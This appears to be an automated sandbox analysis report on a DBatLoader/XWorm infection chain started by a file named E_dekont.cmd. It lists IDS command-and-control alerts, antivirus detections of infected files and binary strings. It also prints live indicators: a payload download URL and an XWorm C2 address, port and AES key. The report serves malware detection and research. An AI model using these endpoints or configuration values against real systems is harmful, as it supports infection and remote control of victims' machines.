                2024-11-01T08:26:11.008160+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:22.510398+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:26.920870+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:27.080118+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:32.085586+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:32.234668+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:40.211588+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:42.366975+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:42.516224+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:53.944899+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:58.429742+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:10.122699+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:10.271854+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:15.195764+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:17.585568+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:19.507877+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:31.101255+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:40.214322+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:42.648419+010028528701Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:46.018377+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:23:57.510611+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:09.009008+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:20.522968+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:32.009895+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:41.666370+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:43.079937+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:47.232962+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:50.165460+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:24:58.639056+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:04.041691+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:10.059508+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:21.736445+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:22.900401+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:32.760012+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:33.701299+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:33.758283+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:33.848152+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:39.439810+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:39.959728+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:39.965053+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:40.231794+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:40.563650+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:40.568793+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:47.290307+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:55.806711+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:55.961031+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:07.321143+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:11.013950+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:22.514173+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:26.926028+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:27.085713+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:32.087557+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:32.236395+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:42.387927+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:42.517884+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:53.946613+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:58.431917+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:10.198646+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:15.197934+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:17.587127+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:19.511336+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:31.112355+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:40.212666+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:10.211554+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:40.219750+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:10.215574+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:40.218338+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:10.211450+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:40.211588+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:10.271854+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:40.214322+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:25:39.986938+010028531931Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                Found malware configuration
                Source: E_dekont.cmdMalware Configuration Extractor: DBatLoader {"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}
                Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Multi AV Scanner detection for domain / URL
                Source: uaafd.bizVirustotal: Detection: 12%Perma Link
                Source: xnxvnn.bizVirustotal: Detection: 13%Perma Link
                Source: nlscndwp.bizVirustotal: Detection: 11%Perma Link
                Source: vjaxhpbji.bizVirustotal: Detection: 13%Perma Link
                Multi AV Scanner detection for submitted file
                Source: E_dekont.cmdReversingLabs: Detection: 44%
                Source: E_dekont.cmdVirustotal: Detection: 46%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Machine Learning detection for dropped file
                Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifUnpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifUnpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
                Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
